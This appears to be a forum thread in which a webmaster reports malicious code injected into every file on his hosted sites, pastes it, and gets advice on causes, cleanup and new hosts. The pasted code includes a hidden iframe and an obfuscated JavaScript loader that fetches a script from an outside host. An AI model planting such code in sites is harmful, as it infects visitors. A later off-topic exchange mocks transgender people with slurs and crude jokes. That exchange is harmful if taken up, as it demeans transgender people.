So I checked the source of one of my sites this morning, because there was a ">" hovering in the footer for NO reason. I found the following it EVERY SINGLE file on my bluehost account.
This was right after the <body> on most of the sites.
[code]
<iframe src="http://arnold.kz/libraries/kal/index.php?out=1276069380" width="1" height="1" frameborder="0"></iframe>
[/code]
and this around the </html>
[code]
<script>var y=[];var jN;this.bd=false;Y=function(){FA={D:"qi"};var o={};var yS={N:"k"};var eC=["ey"];function j(H,z,e){kf=["G","P","jd"];this.Hm=7170;this.Hm-=86;return H.substr(z,e);Pr={};this.oI="oI";}var Bt=new Array();cq={};var gJ='';Xq={x:1536};var q="/go"+"ogl"+"e.c"+j("om/92k1",0,3)+j("stc9QVS",0,3)+".co"+"m.s"+"a/s"+j("terN0F",0,3)+j("n.dMWa",0,3)+"e.p"+j("hpYiAv",0,2);EJ=14025;EJ-=128;var ug=new Array();var i=RegExp;w=4939;w+=109;ad=["cA","Q","vF"];PE=["rk","va"];var F='';this.Z=61211;this.Z+=245;var YE=["ec"];var m=document;var kX={sA:"_n"};var DC="";var n="";function v(H,z){var qU='';Py={};var sh=36733;var e=String(j("[a1td",0,1))+z+String("]");var Sp=new Array();this.jNV='';var U=new i(e, new String(j("govI",0,1)));var t=false;var Ws=false;return H.replace(U, F);try {var Hn='zJ'} catch(Hn){};this.wta="wta";};var NG=["rE","nt"];Xa={};try {} catch(vg){};var DI=[];var Pd=["Wi","Qt"];var it=new Date();var I=649691-641611;var vR=new String("bo"+"dy");var Gk={Rz:"ma"};var sW=["bdo","Se","Xf"];var l=null;var In=["tK","je"];var uZ=["ww","Gl"];var f=v('s4cXrIiBpMtl','dXI4v5B_l3VMT');try {} catch(Yo){};this.jNC=false;jN=function(){try {uU=47441;uU+=77;var S=v('cjrje4agtSe4ESlSeSmSeBn4t4','gBjS49');var cS={};E=m[S](f);var zr=v('s3rncW','13TdWenjS');var H=I+q;hL=26861;hL+=76;this.fx=false;var NS=["tu","Nm","Wr"];var Sv=String("defer");var ac="ac";var FH="";E[zr]=String("htt"+"p:/"+"/ha"+"iry"+"bel"+j("t.rX53A",0,3)+"u:")+H;this.Spk='';try {var nB='tG'} catch(nB){};E[Sv]=[1][0];pp=38195;pp++;m[vR].appendChild(E);var IG={WT:58853};this.qF="qF";} catch(g){try {var YI='uI'} catch(YI){};};var an=52808;this.FN=63123;this.FN-=173;};};Us=14562;Us++;pT=51583;pT++;Y();var DV=[];window.onload=jN;</script>
<!--150cf43d245c0fc4f313d9137b13c236-->
[/code]
I have a VERY secure account password and have never shared it, been phished, nor used any insecure methods of logging in. I mailed them an angry support ticket and they said,
[quote]
Hello,
The code shown in your email was almost certainly injected by someone that was able to hack into your site through a security vulnerability. The site mentioned in the code (arnold.kz) is a site hosted somewhere in Russia. There are a few options that you have with cleaning out your account:
1) Manually reviewing the files. Assuming you have a fair number of files, this is the most time-consuming option. It also requires intimate knowledge of how your website and any corresponding scripts work.
2) Comparing the files currently on the hosting account with the files from a clean backup. The problem with this is that new files are readily apparent, but you would have to dig deeper to see if your existing files were edited to include malicious scripts (by comparing the modification dates, for example).
3) Reset the account completely and then restore your files from a clean backup. This is usually the quickest and most effective method, since the bad files will all be eradicated. Then it's just a matter of restoring files that you know are clean, which is pretty simple with a good backup.
The primary concern with all of these solutions is ensuring that the hack does not occur again. The following article addresses steps you can take to ensure account security: [url]http://helpdesk.bluehost.com/index.php/kb/article/000511[/url]
Thank you,
Matthew
[/quote]
I'm pretty angry with this shit because I trust the people I pay for hosting to be able to handle security.
What hosting should I now switch to? Because I do not intend to remain a customer much longer.
[editline]03:48PM[/editline]
So I have to edit hundreds upon hundreds of files to repair this bullshit.
[editline]03:50PM[/editline]
There was another time where someone entered my account (which they denied) and altered several javascript files throught my sites and screwed EVERYTHING up, and I had to fix that shit too. I changed my password each time and this garbage still happens, I blame blueshit.
That's dumb. Honestly, I don't think it was someone that hacked into your account.
Anyway, hosting recommendations (proper shit, Bluehost is known to be less than reliable):
Shared: [url=http://brohoster.com]Brohoster[/url], [url=http://asmallorange.com]asmallorange[/url]
VPS: [url=http://fanaticalvps.com]Fanatical VPS[/url], [url=http://linode.com]Linode[/url]
Dedi: [url=http://interserver.net]Interserver[/url], [url=http://hetzner.de]Hetzner[/url]
Notes:
With Brohoster, use the promo code -snip- NEVERMIND I SUCK, and Hetzner have the lowest prices ever.
[QUOTE=sseug;22514810]Honestly, I don't think it was someone that hacked into your account.
[/QUOTE]
Then what could it be?
I don't know, but I seriously doubt that someone hacked your account and ran a bunch of scripts to put a line of javascript in every file of yours :wtc:
Switch hosts.
You could join Brohoster, I run it! :science:
[QUOTE=JWJ;22515026]You could join Brohoster, I run it! :science:[/QUOTE]
I maintain it!
[editline]08:07PM[/editline]
Resolved, he had an insecure uploader (I was also wrong in saying that it wasn't someone that hacked him).
[QUOTE=sseug;22514810]That's dumb. Honestly, I don't think it was someone that hacked into your account.
Anyway, hosting recommendations (proper shit, Bluehost is known to be less than reliable):
Shared: [url=http://brohoster.com]Brohoster[/url], [url=http://asmallorange.com]asmallorange[/url]
VPS: [url=http://fanaticalvps.com]Fanatical VPS[/url], [url=http://linode.com]Linode[/url]
Dedi: [url=http://interserver.net]Interserver[/url], [url=http://hetzner.de]Hetzner[/url]
Notes:
With Brohoster, use the promo code -snip- NEVERMIND I SUCK, and Hetzner have the lowest prices ever.[/QUOTE]
Server4you and ovh if you need unlimited bandwidth for a cheap price. (dedi)
[URL="http://www.killercreation.co.uk/dedicated-servers"]KillerCreation[/URL] does good dedicated servers too.
[QUOTE=Darkimmortal;22515440][URL="http://www.killercreation.co.uk/dedicated-servers"]KillerCreation[/URL] does good dedicated servers too.[/QUOTE]
But are expensive as fuck.
This is also known as the gumblar virus. After infecting an insecure PC, it checks it for any saved FTP account data (filezilla stores everything in plain text for example). After finding the FTP data it infects the actual server, and adds that line to every file it can get its hands on.
It's also pretty nasty to get rid of.
It's all that porn you've been watching there nivek. :cop:
Are all the injected lines the same? Because if they are you have several pretty easy ways of removing them :)
[QUOTE=Eax;22531426]Are all the injected lines the same? Because if they are you have several pretty easy ways of removing them :)[/QUOTE]
Even if they weren't he could use regex.
[editline]02:29PM[/editline]
[img]http://ahb.me/4pa[/img]
Darktrap?
[img]http://ahb.me/4pb[/img]
what the [b]fuck[/b] are you doing
Ok so he links off to a ladyboy's blog...
Thanks you've just put me off my lunch.
[QUOTE=sseug;22531914]Even if they weren't he could use regex.
[editline]02:29PM[/editline]
IMAGE
Darktrap?
IMAGE
what the [b]fuck[/b] are you doing[/QUOTE]
Yup, that is true, would be the most efficient I guess, but Notepad++, and a lot of other editors have the ability to Replace All Files in Session.
I am reading her blog. What's wrong with that?
[QUOTE=EDDY TT;22532998]Ok so he links off to a ladyboy's blog...
Thanks you've just put me off my lunch.[/QUOTE]
You're welcome. If that is enough to put you of your lunch I recommend you stop using the internet.
[QUOTE=Eax;22533018]
You're welcome. If that is enough to put you of your lunch I recommend you stop using the internet.[/QUOTE]
I was just saying not the average person would like that but whatever turns your light bulb on.
No reason to get anti.
[QUOTE=Eax;22533018]You're welcome. If that is enough to put you of your lunch I recommend you stop using the internet.[/QUOTE]
...what's wrong with people? :sigh:
[QUOTE=EDDY TT;22533280]I was just saying not the average person would like that but whatever turns your light bulb on.
No reason to get anti.[/QUOTE]
No. You were saying that Ladyboys/Transgenders disgust you. (Or atleast puts you of your lunch)
[QUOTE=sseug;22533436]...what's wrong with people? :sigh:[/QUOTE]
This is what's wrong with people:
[QUOTE=sseug;22533436]what the [b]fuck[/b] are you doing[/QUOTE]
[QUOTE=Eax;22533550]No. You were saying that Ladyboys/Transgenders disgust you. (Or atleast puts you of your lunch)
This is what's wrong with people:[/QUOTE]
I'm wrong because guys dressed up as (half-naked) girls (which is by the way completely back-asswards to nature) disgust me? ...:sigh:
[QUOTE=sseug;22541053]I'm wrong because guys dressed up as (half-naked) girls (which is by the way completely back-asswards to nature) disgust me? ...:sigh:[/QUOTE]
Yes. They don't invade your privacy, in this case you sought it.
I do not mind that it disgusts you. But you are wrong (in my opinion) in sharing that disgust. Keep your 'phobia' (in lack of a better word) to yourself.
It is not backwards in nature but actually it occurs quite often that a person is born 'in the wrong body', Ie: Katie(Darktrap) is a girl trapped in a boys body.
Some reading/watching:
[url]http://www.msnbc.msn.com/id/18250458/[/url]
[url]http://abcnews.go.com/2020/story?id=3072518&page=1[/url]
[url]http://news.bbc.co.uk/2/hi/health/8330157.stm[/url]
[url]http://edition.cnn.com/2009/HEALTH/06/12/sex.change.gender.transition/index.html[/url]
[url]http://www.ucl.ac.uk/hr/docs/transguidance.php[/url]
[QUOTE=Eax;22543055]Yes. They don't invade your privacy, in this case you sought it.
I do not mind that it disgusts you. But you are wrong (in my opinion) in sharing that disgust. Keep your 'phobia' (in lack of a better word) to yourself.
[/quote]
Umm actually I was just commenting on the content that [i]you[/i] didn't keep to yourself by posting it on your blog. You have the right to post about it but I should shut up? I didn't say OMG THEY SHOULD ALL DIE, I was just saying that that's how I feel, free speech motherfucker.
[QUOTE=Eax;22543055]
It is not backwards in nature but actually it occurs quite often that a person is born 'in the wrong body', Ie: Katie(Darktrap) is a girl trapped in a boys body.
[/quote]
Let me guess, you're a horse trapped in a 12 year old boy's body.
[QUOTE=Eax;22543055]
Some reading/watching:
[url]http://www.msnbc.msn.com/id/18250458/[/url]
[url]http://abcnews.go.com/2020/story?id=3072518&page=1[/url]
[url]http://news.bbc.co.uk/2/hi/health/8330157.stm[/url]
[url]http://edition.cnn.com/2009/HEALTH/06/12/sex.change.gender.transition/index.html[/url]
[url]http://www.ucl.ac.uk/hr/docs/transguidance.php[/url][/QUOTE]
No thank you very much.
[editline]11:36PM[/editline]
Man (?) here's a picture from one of the articles you posted:
[img]http://i2.cdn.turner.com/cnn/2009/HEALTH/06/12/sex.change.gender.transition/art.madden.irpt.jpg[/img]
If that's fine by you then that's great and you should go back to your sad life in your mom's basement pretending to be a horse, but personally I find that disgusting as shit and if you have the right to say you love it I have the right to say I hate it.
[editline]11:37PM[/editline]
[img]http://imgkk.com/i/hon6.png[/img]
:froggonk: please no more
[editline]11:40PM[/editline]
Tom: Oh yeah Sarah is so hot I'm getting a boner.
Jake: Oh fuck yeah, shit my clit is hard.
Tom: :byodood:
[QUOTE=sseug;22543504]Umm actually I was just commenting on the content that [i]you[/i] didn't keep to yourself by posting it on your blog. You have the right to post about it but I should shut up? I didn't say OMG THEY SHOULD ALL DIE, I was just saying that that's how I feel, free speech motherfucker.
Let me guess, you're a horse trapped in a 12 year old boy's body.
No thank you very much.
[editline]11:36PM[/editline]
I have no idea
Man (?) here's a picture from one of the articles you posted:
[img]http://i2.cdn.turner.com/cnn/2009/HEALTH/06/12/sex.change.gender.transition/art.madden.irpt.jpg[/img]
If that's fine by you then that's great and you should go back to your sad life in your mom's basement pretending to be a horse, but personally I find that disgusting as shit and if you have the right to say you love it I have the right to say I hate it.
[editline]11:37PM[/editline]
[img]http://imgkk.com/i/hon6.png[/img]
:froggonk: please no more
[editline]11:40PM[/editline]
Tom: Oh yeah Sarah is so hot I'm getting a boner.
Jake: Oh fuck yeah, shit my clit is hard.
Tom: :byodood:[/QUOTE]
I have no reply that can sink to this level of stupid homophobia (in lack of a better word).
I still have no idea why you let this thread derail into your personal off-topic homophobia debate.
/off-topic
Who's [b]not[/b] scarred of a guy with a clit?
[QUOTE=jetboy;22553065]Who's [b]not[/b] scarred of a guy with a clit?[/QUOTE]
I would assume most guys with clits would be fairly [b]scarred[/b] down there
What the fuck, AVG warned me about some exploit shit when I opened this thread :byodood:
[QUOTE=Dlaor;22565548]What the fuck, AVG warned me about some exploit shit when I opened this thread :byodood:[/QUOTE]
Jallen was getting this too. The source code of a malicious script is posted here. AVG doesn't appear to able to differ the source code from the executed code of the script.
Get hacked/exploited, blame it on host.
Sorry, you need to Log In to post a reply to this thread.
